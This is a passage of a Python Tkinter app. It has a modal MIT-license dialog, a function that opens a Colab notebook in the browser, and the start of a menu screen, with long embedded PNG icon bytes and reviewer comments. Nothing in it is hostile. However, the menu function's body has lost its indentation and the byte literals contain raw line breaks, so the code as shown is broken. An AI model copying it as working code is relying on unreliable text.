    is part of the menu's button wiring, so it is left unchanged here.
    """
    ls=Toplevel()
    # Make the dialog modal: all input events are routed to this window
    # until it is destroyed.
    ls.grab_set()
    ls.title("License")
    # Embedded PNG icon data (the same 32x32 artwork used by every window
    # in this app).
    # NOTE(review): the bytes literal below contains a raw line break,
    # which looks like paste/export damage rather than intent -- confirm
    # against the original source before reformatting this block.
    photo=PhotoImage(data=b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x06\x00\x00\x00szz\xf4\x00\x00\x00\x01sRGB\x00\xae\xce\x1c\xe9\x00\x00\x00\x04gAMA\x00\x00\xb1\x8f\x0b\xfca\x05\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x03\x95IDATXG\xc5\x96Mh\x1ce\x18\xc7\x7f\xb3\xb3\xbb\xc9dw\xf3\xb5\xd9&-\xbb\xa9E\xd3\xc6|\xb4\x92\xd4\xaa\x8d6\xfd\x10\x0f\x96\x9e\xea\x07\xa8 "(\x08\x1e\xbc(\x1e\nz\x12\xf4\xeaI\xf4$\x14<)(\x05\xa1\x1aK\x9bP\x93\x1aL\xd36iRw\xdb\xa6\x9bd7\xd9uwv\xba\xdf\xb3\xe3\x1b:\x08{\xd0\xce\xab\r\xf9\xc10\x03\xf3\x7f\x99\xff\xbc\xef\xf3\xfcy\x14K\xc0\x16\xe2\xb2\xef[\xc6\x96\x1b\x90:\x82+\xd7\x16\xf1W\xce\xe1k\xa8RL\x17h\xdcy\x08\xb7\xe6GuY$\xaf\x9c#\xd8{\x8c\xa5\x95\x12{\x07\xfb\xed\x15\xf7G\xca\x80\xa2(\xc4&>\xa0b\xaca\xea\x15\xf4\xe5y\x9a\xbaz\xb99\x17e|"\xca\xa9o~\xc2\xd7\xda\x87LYI\x1f\xc1\xd2R\x95B1\x8cQm\xc4\x1d\x19!\x9d5\xd8\xd1\x13f{\x97\x86U)\xd9*\xe7H\x1bx\xf4\x89\x13$S\xeb\xa8\xc54_\x7fw\x19\xb3\xa1\x13\xb59\xc2\xc1#\xfbX[\xf8\xd5V9G\xda\x80\xbev\x9bO\xbe\x18\xe3\xcdO\x7f\xa1?l\xd1\x1c\xeaB\xed\xe8\xc3\xdb="\xce\xf3\xae\xadr\x8e\xb4\x81\xd6`\x07\xef\xbfs\x92\x03\xbb\xc3\xa0\xaa`\xd6\xc8\xa7\xd7\xb9\x9b^\xc10\xb2\xb6\xca9\xd2\x06JF\x9ap\xa7\x9bW_8L\xef\xc0^L\xd5\'\x8a\xaeL!~\x89\xb2n\xd8*\xe7Hw\x81\xb9>N\xe2\xe6\x149C\xc7\xb4T4_\x08\x852\xe5\xc4\x02\x91\xe1\x93h;F\xa5\xba`C\xfc7\xd3\xd3\xd3\x1b+7\xf5\x9a\x9a\x9a\xb2\xbfv\x0f\xe9\x1d\xb0\ng\xc9\'\x17\x11\xbd\x88\xd2\xfe4Z("\xde\xb8Y\x18;\xcd\xee#\xef\xde\xd3H\xec\x80\xfc\x11,\x7f\xce\xc2\xd5KxM\x0f\xa9\xd8<\xfe\xf0 
\xf1\xd8\x12\xe7\x7f\x9e\xe1\xe3o\'\x84&\xbc\xb9Atq\xfc\x1653B&\xafQmy\x84dr\x95\xb6\xf6\x06\x02-\xa2#j\x05[\xe5\x1ci\x03C\xcf\xbdA\xdb\xae!\x02\x9a\x97\xb9\x98N\xce\n\xe1\xed\xd8\xc3\xa1\xa3\xc3\xe4\xa23\xb6\xca9\xd2\x06<\x96\xce\x89WNqf\xd6b\xf0\xb1A\xba{\x87\xb1\x02\xbb\xf0l\x1f\xa6VN\xdb*\xe7H\x1bP5\x1fo\xbd|\x90\\b\x91\xf8\x9d;\xe43\tJ\xb9?\xc5}\x99L\xf2\x96\xadr\x8e\xb4\x01\xf2Y\x8e\xee\xdf\xc6\xf1\xc3=\xb4\xb7\xb8Q\xdd\x1e\xaa\xe5\x1cF\xf4\x02\xd5B\xde\x169G\xbe\r\xad?X\xbfv\x81D\xfc:\x96\xa2\xa1\xf9\xdb\xf0z\xdd\x88\xaf\x13\x19x\x06\xc5\xb7\xff\xbf\x07\xd1\xcc\xe5\xb9\x8d\x95\x9bz\xfdk\x10\xad\xde\xf8\x9ev\xbf\x88U\xbd\x8cg\xdb\x10\x9e\xe66\\.\x95\xcc\xe2EZ{\x9e\x15;\xd0x\xdf\xbf\xfb_A4;\xf6!>e\x9dj\xba\x88\x91\xbcM\x93\x08\x99D,\xce\xf9\xb1\xdfx\xef\xcb\x1f\xf0\x07\xf7=p\x03uE\x18\xbda\x90\xd7C\xe4j\xcdX\xc1>\xd6\x12+\x04\xda\xdd4\xb76b\x96\xe4\x0b\xcc\tu\x06\x06\x9e:.\x12\xaeDS%\xc5\xe93\x0b\xe4\xcc\x16\xdc-\xdd\x8c\x8c\n3\xd7\xe5\xa7\x1d\'\xd4\x19\xc8g\x92|\xf6\xd5Y^\xfc\xe8G\x86\x1fV\xe9\xec\xde\x89\x12\xec\xc7\xf3\xd0\xa8\x98|\xe5c\xd6\tu\x06|\x81\x00o\xbf\xf6\xbc\x98v"\xac\xa6\xc4xe\x8a\x014\x93\x12\x13O\x92\x9c\x08\x9b\xcd\xa0\xce@\xb9\x98\x13\xd3N\x03\xaf\xbft\x8c\xc7\x9f<@Ui\xda(S\x8a\x89\x19\x8aY\xddV=X\xea\x0c\xb8\\^jU\x03\xc5\x93\xa7R\xcd\x8b\xe7\x02V9+&\x1e\x8fh\xcb=\xfc>;o+\xff\x99\xc9\xc9I\xfb\xc9\x19RI\xb8\x19\xd4\xed\xc0V\xb0\xc5\x06\xe0/\t\x12\xef\xcd\xd8j\x93\xad\x00\x00\x00\x00IEND\xaeB`\x82')
    ls.iconphoto(False,photo)
    ls.configure(bg='#404040')
    # MIT license text shown to the user (runtime string, kept verbatim).
    text='''Copyright 2021 Aniket Maity
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.'''
    # NOTE(review): .pack() returns None, so `label` and `b01` end up None;
    # harmless here because neither variable is used afterwards.
    label=Label(master=ls,text=text,font=('Calibri',15),wraplength=500,bg='#404040',fg='white').pack()
    b01=Button(master=ls,text='Close',font=('Helvetica',10),width=10,bg='#363636',fg='white',command=ls.destroy).pack(pady=5)
    # mainloop() on a Toplevel drives the same Tk event loop as the root;
    # it returns once the window is dismissed.
    ls.mainloop()
def more():
    """Open the project's Colab notebook in the user's default web browser.

    Fix: the original called the builtin ``open()``, which interprets its
    argument as a local file path and therefore raised FileNotFoundError
    when given an HTTPS URL. ``webbrowser.open`` is the correct stdlib call
    for launching a URL.
    """
    # Local import keeps this chunk self-contained; webbrowser is stdlib.
    import webbrowser
    webbrowser.open("https://colab.research.google.com/drive/1dkFScEkzyDjLS4OvYtJxvvC8AMGDzlTK#scrollTo=SoriZIQIm1FR")
def menuscreen():
global menu
menu=Tk()
photo=PhotoImage(data=b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x06\x00\x00\x00szz\xf4\x00\x00\x00\x01sRGB\x00\xae\xce\x1c\xe9\x00\x00\x00\x04gAMA\x00\x00\xb1\x8f\x0b\xfca\x05\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x03\x95IDATXG\xc5\x96Mh\x1ce\x18\xc7\x7f\xb3\xb3\xbb\xc9dw\xf3\xb5\xd9&-\xbb\xa9E\xd3\xc6|\xb4\x92\xd4\xaa\x8d6\xfd\x10\x0f\x96\x9e\xea\x07\xa8 "(\x08\x1e\xbc(\x1e\nz\x12\xf4\xeaI\xf4$\x14<)(\x05\xa1\x1aK\x9bP\x93\x1aL\xd36iRw\xdb\xa6\x9bd7\xd9uwv\xba\xdf\xb3\xe3\x1b:\x08{\xd0\xce\xab\r\xf9\xc10\x03\xf3\x7f\x99\xff\xbc\xef\xf3\xfcy\x14K\xc0\x16\xe2\xb2\xef[\xc6\x96\x1b\x90:\x82+\xd7\x16\xf1W\xce\xe1k\xa8RL\x17h\xdcy\x08\xb7\xe6GuY$\xaf\x9c#\xd8{\x8c\xa5\x95\x12{\x07\xfb\xed\x15\xf7G\xca\x80\xa2(\xc4&>\xa0b\xaca\xea\x15\xf4\xe5y\x9a\xbaz\xb99\x17e|"\xca\xa9o~\xc2\xd7\xda\x87LYI\x1f\xc1\xd2R\x95B1\x8cQm\xc4\x1d\x19!\x9d5\xd8\xd1\x13f{\x97\x86U)\xd9*\xe7H\x1bx\xf4\x89\x13$S\xeb\xa8\xc54_\x7fw\x19\xb3\xa1\x13\xb59\xc2\xc1#\xfbX[\xf8\xd5V9G\xda\x80\xbev\x9bO\xbe\x18\xe3\xcdO\x7f\xa1?l\xd1\x1c\xeaB\xed\xe8\xc3\xdb="\xce\xf3\xae\xadr\x8e\xb4\x81\xd6`\x07\xef\xbfs\x92\x03\xbb\xc3\xa0\xaa`\xd6\xc8\xa7\xd7\xb9\x9b^\xc10\xb2\xb6\xca9\xd2\x06JF\x9ap\xa7\x9bW_8L\xef\xc0^L\xd5\'\x8a\xaeL!~\x89\xb2n\xd8*\xe7Hw\x81\xb9>N\xe2\xe6\x149C\xc7\xb4T4_\x08\x852\xe5\xc4\x02\x91\xe1\x93h;F\xa5\xba`C\xfc7\xd3\xd3\xd3\x1b+7\xf5\x9a\x9a\x9a\xb2\xbfv\x0f\xe9\x1d\xb0\ng\xc9\'\x17\x11\xbd\x88\xd2\xfe4Z("\xde\xb8Y\x18;\xcd\xee#\xef\xde\xd3H\xec\x80\xfc\x11,\x7f\xce\xc2\xd5KxM\x0f\xa9\xd8<\xfe\xf0 
\xf1\xd8\x12\xe7\x7f\x9e\xe1\xe3o\'\x84&\xbc\xb9Atq\xfc\x1653B&\xafQmy\x84dr\x95\xb6\xf6\x06\x02-\xa2#j\x05[\xe5\x1ci\x03C\xcf\xbdA\xdb\xae!\x02\x9a\x97\xb9\x98N\xce\n\xe1\xed\xd8\xc3\xa1\xa3\xc3\xe4\xa23\xb6\xca9\xd2\x06<\x96\xce\x89WNqf\xd6b\xf0\xb1A\xba{\x87\xb1\x02\xbb\xf0l\x1f\xa6VN\xdb*\xe7H\x1bP5\x1fo\xbd|\x90\\b\x91\xf8\x9d;\xe43\tJ\xb9?\xc5}\x99L\xf2\x96\xadr\x8e\xb4\x01\xf2Y\x8e\xee\xdf\xc6\xf1\xc3=\xb4\xb7\xb8Q\xdd\x1e\xaa\xe5\x1cF\xf4\x02\xd5B\xde\x169G\xbe\r\xad?X\xbfv\x81D\xfc:\x96\xa2\xa1\xf9\xdb\xf0z\xdd\x88\xaf\x13\x19x\x06\xc5\xb7\xff\xbf\x07\xd1\xcc\xe5\xb9\x8d\x95\x9bz\xfdk\x10\xad\xde\xf8\x9ev\xbf\x88U\xbd\x8cg\xdb\x10\x9e\xe66\\.\x95\xcc\xe2EZ{\x9e\x15;\xd0x\xdf\xbf\xfb_A4;\xf6!>e\x9dj\xba\x88\x91\xbcM\x93\x08\x99D,\xce\xf9\xb1\xdfx\xef\xcb\x1f\xf0\x07\xf7=p\x03uE\x18\xbda\x90\xd7C\xe4j\xcdX\xc1>\xd6\x12+\x04\xda\xdd4\xb76b\x96\xe4\x0b\xcc\tu\x06\x06\x9e:.\x12\xaeDS%\xc5\xe93\x0b\xe4\xcc\x16\xdc-\xdd\x8c\x8c\n3\xd7\xe5\xa7\x1d\'\xd4\x19\xc8g\x92|\xf6\xd5Y^\xfc\xe8G\x86\x1fV\xe9\xec\xde\x89\x12\xec\xc7\xf3\xd0\xa8\x98|\xe5c\xd6\tu\x06|\x81\x00o\xbf\xf6\xbc\x98v"\xac\xa6\xc4xe\x8a\x014\x93\x12\x13O\x92\x9c\x08\x9b\xcd\xa0\xce@\xb9\x98\x13\xd3N\x03\xaf\xbft\x8c\xc7\x9f<@Ui\xda(S\x8a\x89\x19\x8aY\xddV=X\xea\x0c\xb8\\^jU\x03\xc5\x93\xa7R\xcd\x8b\xe7\x02V9+&\x1e\x8fh\xcb=\xfc>;o+\xff\x99\xc9\xc9I\xfb\xc9\x19RI\xb8\x19\xd4\xed\xc0V\xb0\xc5\x06\xe0/\t\x12\xef\xcd\xd8j\x93\xad\x00\x00\x00\x00IEND\xaeB`\x82')
menu.iconphoto(False,photo)
photo=PhotoImage(data=b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x01\xf4\x00\x00\x01\xf4\x08\x06\x00\x00\x00\xcb\xd6\xdf\x8a\x00\x00s\xbdIDATx^\xed\x9d\x05\x98UU\xf7\xc6\x19:\x86\x92\xeeFB@\x0cJ\xf4o\xa0\xd8\n\x8a\xdd\x18\xa0\xd8\x18\x9f\x80(v\x81\x01v#\xa5\xa0\xe8gc\xa2\x08\xd8\x89t\xc7\xd0\xdd0\xf3\x7f\xdf\xc3]\xf3\x1d\xaf\x03sg\xe6\xc6\x89\xf7<\xcf<w\xe6\xdesv\xfc\xf6\x99\xfb\x9e\xb5\xf6\xdak\x17*\xa4C\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04RF\xa0I\x93&\x95\xdf~\xfb\xed1sq\\|\xf1\xc5\xe7\xa5\xac!\xaa8\xd0\x04\xaaV\xadZt\xf8\xf0\xe1\xaf\xcc\x9b7oN\xdf\xbe}o\xa8P\xa1B\xd1@wX\x9d\x13\x01\x11\x10\x81d\x13\xc8\xca\xca\xca\xdc\xbd{7^\xf6\x1c\xa7\x9cr\xca\xf1\xc9n\x83\xea\x0b>\x81i8v\xec\xd8\xe1\xdcc;w\xee\xcc\xea\xd9\xb3\xe7\xa5\xc1\xef\xb5z\xe8g\x02\x85\xfd\xdcx\xb5=|\x04`5\x95F\xaf\xd3\xac\xe7\x10\xf6Bm\xda\xb498|$\xd4\xe3D\x13h\xda\xb4i\xf3b\xc5\x8a\x15\xa2
\xa0\x17-Z\xb4P\xf7\xee\xdd\xcfMt\x9d*_\x04\nB@\x82^\x10z\xba6\xe9\x04J\x96,Y\x1a\xd6\xd2\xce\xc2\x85\xf7\xdc\xbaE\x8a\x14)\x94\x9e\x9e^&\xe9\rQ\x85\x81\'\x80{+\x8b\x9d\x84\x95\xbe\x1d\x9a^h\xfb\xf6\xed[\x02\xdfiu\xd0\xd7\x04$\xe8\xbe\x1e\xbe\xf05\x1eZ\xbe\x03VS1\xf6\x9c\xd69\x8f\x8d\x1b7\xae\x0f\x1f\t\xf58\x91\x04*W\xae\\4\x13\x07\xeb(Q\xa2D\xc9\xb4\xb4\xb4B\xb8\xf7\xb6%\xb2N\x95-\x02\x05% A/(A]\x9fT\x02\xfcb\xb5\x83\xd69\xbfsa\xa1\xa7\'\xb5\x11\xaa,\xf0\x04V\xadZ\xb5\x0b\xf7Z\xf6\xcd\x061\xa77H\xdf\x97\x81\x1fy\x7fwP7\xa8\xbf\xc7/\x8c\xadw\x82\x94\xac\xe3t\xbd\xd3\x05\x1fF\x10\xeas\xd2\x088s\xe8:D\xc0\xeb\x04$\xe8^\x1f!\xb5/\x9a\x80\xe3\x06\x8d:\xb2\x05^\xb8D \x81\x04t\x9f%\x10\xae\x8a.8\x01\tz\xc1\x19\xaa\x04\x11\x10\x01\x11\x10\x01\x11H9\x01\tz\xca\x87@\r\xc8#\x01YIy\x04\xa6\xd3E@\x04\xc2A@\x82\x1e\x8eq\x0eR/\xff\x17\x15\xf7\xbf^I\xe4\x834\xc2\xea\x8b\x08\x88@\xbe\x08H\xd0\xf3\x85M\x17\xa5\x98\x80\x04<\xc5\x03\xa0\xeaE@\x04\xbcG@\x82\xee\xbd1Q\x8bD@\x04D@\x04D \xcf\x04$\xe8yF\x16\xde\x0b\xb0\xdc\xbbH\xb7n\xddN\xaa^\xbdzE\xa4`-N\x12\xa5K\x97\xd6z\x9e\xf0\xde\x12\xea\xb9\x08\x88\x80\x87\x08H\xd0=4\x18^nJ\x95*UJ\xbf\xff\xfe\xfb\x9fb\x97\xb3\xf7\x97,Y\xb2f\xf9\xf2\xe5\xdb\x98I\xeb\xf3\xcf?\xff\xb6b\xc5\x8a\xc5\x0e9\xe4\x90\xa6\'\x9f|\xf21\xc9\xe8\x03\x13~\xb8\x96\xa2\'\xa3J\xd5\x11r\x02\xee\x84F!G\xa1\xee{\x98\x80\xac\xab\xa8\xc1)W\xae\\\xfa\x86\r\x1b6yx\xcc\x92\xd6\xb4\x8e\x1d;\xd6\xafQ\xa3F\xe3\'\x9ex\xe2\xa5\xda\xb5k\xd7\xb5\x8a\x99\xcc\x05iW\xd3\x98\xa9\xad=\x0ed\xd5\xda\x8a\xf7\x8al\xd9\xb2e\xdbC\x0f=4\xe8\xd3O?\x1d?e\xca\x94\xbf\x93\xd6PU$\x02" 
\x02"PH\x16z\xe4&\xe8\xd7\xaf\xdf\xf5\xd8\xf7\xf8o\x08z1\xb8\x93C\x9fJ\xf4\xca+\xaf<\xafL\x992\xd5\xc7\x8c\x19\xf3a\xcd\x9a5\xb3\xc5|\xdb\xb6mN\xbaU\x8a9s\xa9\xd3r\xa1\x98G\xdc\xef%\x07\x0c\x18p\xffw\xdf}\xf7g\x8b\x16-\xea\xe9\xffK\x04D@\x04D@\x04\x92J\xe0\x80\x03\x0e\xa8\xf4\xc5\x17_|\xca\x94\xa2#G\x8e\x1c^\xb7n\xdd\xf2\'\x9cp\xc2\xd1-[\xb6l\x98\xd4\x86x\xa4\xb2F\x8d\x1aU\x84X\xef\xb2\xfd\xc6mOh\xf7\x1e\xe4\x10\xf5\xec\xfd\xc8\xb7n\xdd\x9a\xfd\xbb\x9d\x03W\xfc\xe7\x89\xe8\x0e\x1e.\xcap?tw\xfd\x83\x06\r\xea\x9f\x88\xbaTf\xb8\t\xe0\x1e\xdb\x1d\xb9\xb1\x9d\x9b}\xec\xd8\xb1c\xc2MD\xbd\x17\x01\x1f\x10\xa8S\xa7N1\xee\xe2\xc5\x7fZ\n\x12~w\xc4\x8c\xff\xd0_~\xf9\xe5\xe7/\xbd\xf4\xd23=z\xf48\x11\xfb#W\xf1Aw\xf2\xdcD\x04\xb6\x15n\xd7\xae]\xb3c\x8e9\xa6\xc3\xc2\x85\x0b\xe7\x9aZ\x82\x83\xf3}\xb6kW\xb6\xb6;\xbf\xf3\xc7\x84\xdb-\xac\xd8^2[\xd8\xf9\x0bx\xc5\xfd\x81H\x82\x9e\xe7\xe1\xd5\x05\xf9$ A\xcf\'8]&\x02\xa9$p\xc6\x19g\x9c\x10\x11p\x8a\xb9#Jnq\xe2{\x11\x01\xcb|\xf7\xddw\xdfj\xd5\xaaU`\xdc\xc9\x0cf\x83\x987\xe7\xf3\x8b\x89tN\x96\xb8[\xc4\xed\xc1\xc7\xad\xdef\xc5\xc3%\x9f\xfd6\xbd\x1c\xf1\x1eW\tz\xbc\x89\xaa\xbc\xbd\x11\x90\xa0\xeb\xde\xf0\x1b\x01\xcd\xa1c\xc4`\x99\x1e\x0b!r6\xfd\xe0\xaeJ\x8c\xa0\x8el\xb9\xed\x8c\'\xdf\x8b\xec\xbd\x9dv\xe2\x89\'\x9e\tQ\xff\xdao\x03\x9dS{\x9b4iR\xbbs\xe7\xce\x87c\xce\xfbw<\xb4\xa41\xd8\x8d\xf3\xe3|\xb5(r\x08\xb9s)\xe7\xcc\xed\xe0g<\x87\x87\x9dg\x7fc\xefh\xe7=\xfe\xe0\xc1\xa7u\x108\xa9\x0f" \x02"\xe0\x07\x02\x12t\x8c\xd2\xd2\xa5K\x97\x94,Y\xb2\xb0-M\x89^\xa2\xc2\xdd9)\xf0\x14u\x8a{\x83\x06\r\xea!\xf8\xebv\xcc\xb1W\xf5\xc3 
\xef\xad\x8d\x10\xdc\x96\x88J\x7f\x16b\x8dn\xedY\xf0\x10\x89`w\x82\xdd\xec\xc1\xc6D\xdb\xca\xa1\xe8\x9b\x98\x1b+^g\xe2\xcf\xf7\xf8\x83\xb2\x07\xef\xbf\xff\xfe5\xfc\xccHm\x17\x01\x11\x10\x01\xbf\x10\x90\xa0c\xa4z\xf6\xec\xd9\xcb=`\x14p\nR\xc4*\xcf\xb6\xd6\xddV*\x02\xb1\x1e\xf8\xf3\xcf?3\xfc2\xd09\xb5\x13\x81\x80_\xa3O\xce=\xc0\xfeR\xa8-\x82\xdd\xdes\xbf\x9a\x15n\x1cL\xcc)\xf8\x91h\xf7\x7fT3\x7f\xfe\xfc%eq\xc4\x99QN\xb9\xdc\xe3\\\x85\x8a\x13\x81\xff\x11\xe0\x1cR\xe4\x01V)\x87ucx\x9a\x80\x04\x1d\xc3\x835\xd6\xf5)\xdefy\x9a\xdb\xdd-\xe0{\x19\xc54,\xeb\x1a\xe1\xe9\x11\xdeG\xe3\x8a\x17/^h\xe5\xca\x95\x19X?\xee\x9cE\xc16\xd1&\x8bh\xcb<\xa7\xa2x\x1e\xc5\x1c1\x07\xce\xf9\xc6\x10b\xbe\xb0W\xaf^=P\xfe<\xbf\xf2Q\xbbE@\x04D\xc0O\x04$\xe8\x18\xada\xc3\x86=B\xf161\xa3@\xd1J\x8f\xe58\xeb\xac\xb3\xcec\x84\xfc\xddw\xdf}K,\xe7{\xe9\x1cD\xb7\x97\xaaV\xadZu\xbc:\xcdr\x8b8Y\xc4\x92\x1d\xcb=wn\x0f@\xe4q\xe9\xa5\x97\x1e\xff\xc9\'\x9fLY\xb0`Al \xbd\x04Fm\x11\x01\x11\x10\x01\x1f\x12\x90\xa0\xef\xb1L\x9d\td\n\x1a\x85\x9c\xaf\xb4^c\x11u\x9e\x0b\x8b\xbeX\xff\xfe\xfd\x1fFZ\xd4W\x8e=\xf6\xd8\x96~\xb9\x0f^|\xf1\xc51\x10m\xe7\x1e0w\xbb[\xc4c\xb1\xd0\x8d\x91MOP\xe0\xf1\x90s$\x82\xed\x12\xb9\x12@nw\xbf\xdcdj\xa7\x08\x88@\xd2\x08(\xf5+PS\x8c(L\xb40\xdd\xd1\xed\xee\xdf\xf76"\x16\x11N!DPX\xd9f\xcd\x9a\x1d4a\xc2\x84\xbf\x926\x82\xf9\xac\xe8\xcd7\xdf|\x83\xd1\xfdXn\xe6\xf4\xd9\xedng\x916/\x9e[\xf1\xc6\x88\x0c\x17\xe3@&\xd8&\xcc\xf3>~\xfc\xf8\xdc.\xd5\xe7" \x02" 
\x02"\x10_\x02\x95*U*\xff\xec\xb3\xcf>ak\xd1\x99,\x05\xf3\xcaL,\xf3\x8fD){\xfb\xc3\x9dxe\xe2\xc4\x89_\x9es\xce9]\xb1\xb6\xfd\xff\xe2\xdb\xca\xf8\x956t\xe8\xd0Gm\xdd\xb8\xbbO\xb1\xf67\x9a\xc3\xe6\xcd\x9b\xb3\xee\xbd\xf7\xde\xbb\x11\x8b\xe0\xec\xc0\x96\xc8\x03\xeb\xd0\xd3m\x9c\xac\x1d\xca\x14\x97H\xe2\xe1-\xdb\xd6\xa1\xdb\xeb[o\xbd5:\xbc4\xd4s?\x10\x90\xcb\x1d\xa3\xb4z\xf5\xea\xf5\xd8\x80\xe4a\x08\xf3N\x8b\xf6.U\xaaTLAa\x1cd\xcbkN+\xf5\xf0\xc3\x0f?r\xc4\x88\x11\x1f\xc1R?\xb0B\x85\n\x9es\r#G\xfb\x05\xbd{\xf7\xbe\xd9\x96\xa9\x99\xab\x9dK\xce\xdc.vw\x80\xdb\xbend^\x8f9\xf8,\x04\xb3g\xc1@\xdf\xe1\x87\x9b^m\x14\x01\x11\x10\x81 \x12\x90\xcb=2\xaa\x19\x19\x19+\xa6\xe2\xe8\xd4\xa9Sg\n4]\xf0&z\xb9\t\x1a\xdd\xd5\xee\x88x\xfc\x9d\x86\xfc\xf0\x07\xae[\xb7\xceS\xcb\\\xb0{Z\xcbg\x9ey\xe6U\x9b&\xb0$2\xec\x9f\xbdgIa\xec\xbd\\n\xfa,z#p\xcdn\xa4n\xff2\x88\xff \xea\x93\x08\x88\x80\x08\x88\x80\x0f\t \xa0\xedpX\xd9\x8e\x9f\xdd\\\xd2\xe6\x86\xe6\xab\xa5\x85\xe5\xe7\xe6fg\x9aT;\xc7\x9d2\x95\x9b\x9b\x1cz\xe8\xa1\xb5\xbd\x82a\xe0\xc0\x81\xb7Z\x9b\xdd}rO\x17\xec\xcd\xfdn\xfdr\xf7\x1f\x1bU\x8c\xfc\xcf\x7f\xfe\xd3\x1b\x0f\t\xd5\x93\xd9G\xb9\xdc\x93I;\xdcu\xc9\xe5\x1e\xee\xf1W\xef\x03@`\xf4\xe8\xd1#\xa2\xe7\x92)d\xd1\xb9\xdd\xdd\xe2GQ\xe45\xf6\xc3\xcf\xb0\\k\t\x84\xd03K\xb6f\xcd\x9a\xb5\xd8\xddf\xb78\xb3\xdd&\xec\xd6O\xf7C\x8a\xfb\\\x8a;\x1fVR5\xd4\x12\xf4T\x91\x0f_\xbd\x12\xf4\xf0\x8d\xb9\xdf{\xac9\xf4\xa8\x11\xe4\\\xfa\xf7\xdf\x7f\xff\xb3%H\xe1\xc7t\xbds\x19\x9b-\xcd2W\xbc-qs\xef\rn\xd7a\x0b\xd6\x9a\x98\x8f/\xda\xad[\xb7cRy\x93\xd4\xaaU\xab\xdc78\x1a7n\\\x8b\xed\xc0V\xa7\xce\\\xb9\xf5\xc1\x1d\xe1\xefv\xb3[,\x81\xf5\x9f\xe7\xf1:\xb8\xe6\xb3\xfe\xfb\xdf\xff\xbe\x99\xca>\xa9n\x11\x10\x01\x11\x10\x81\x7f\x13\xd0\x1cz\x14\x93\xc9\x93\'\xff\xd6\xb5k\xd7\xf6\xbf\xfd\xf6\xdb\\\x88r\x1dK2\x13\xbd\x84\x8dAd\x96\xdf\xddD\xcfr\xbeS4)\xf2|\x08@\xe4w"\xd7c\xe7zO#@\xef\x1d\xac\t\xefLAf_\x18\xecg\x07\x97\xac\xb1\x8d6\xff\xcf>\xb9\xd7\xa1\xbb7`\xe19\xb4X\xb0,\xadn\xbdz\xf5<3\x95\x90+\x00\x9d \x02" 
